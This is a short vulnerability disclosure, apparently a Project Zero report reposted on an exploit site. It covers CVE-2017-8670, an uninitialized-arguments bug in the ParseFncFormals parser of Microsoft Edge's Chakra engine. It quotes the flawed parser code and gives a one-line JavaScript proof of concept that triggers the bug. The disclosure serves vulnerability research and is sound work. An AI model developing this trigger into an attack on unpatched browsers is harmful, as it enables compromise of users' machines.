Home / exploits Microsoft Edge Chakra Parser::ParseFncFormals Uninitialized Arguments
Posted on 17 August 2017
Microsoft Edge: Chakra: Uninitialized arguments 2 CVE-2017-8670 Similar to the <a href="/p/project-zero/issues/detail?id=1297" title="Microsoft Edge: Chakra: Uninitialized arguments" class="closed_ref" rel="nofollow"> issue #1297 </a>. But this time, it happends in "Parser::ParseFncFormals" with the "PNodeFlags::fpnArguments_overriddenInParam" flag. template<bool buildAST> void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags) { ... if (IsES6DestructuringEnabled() && IsPossiblePatternStart()) { ... // Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward. for (ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext) { Assert(lexNode->IsVarLetOrConst()); UpdateOrCheckForDuplicateInFormals(lexNode->sxVar.pid, &formals); lexNode->sxVar.sym->SetSymbolType(STFormal); if (m_currentNodeFunc != nullptr && lexNode->sxVar.pid == wellKnownPropertyPids.arguments) { m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam; <<------ HERE } } ... ... } PoC: function f() { ({a = ([arguments]) => { }} = 1); arguments.x; } f(); This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt
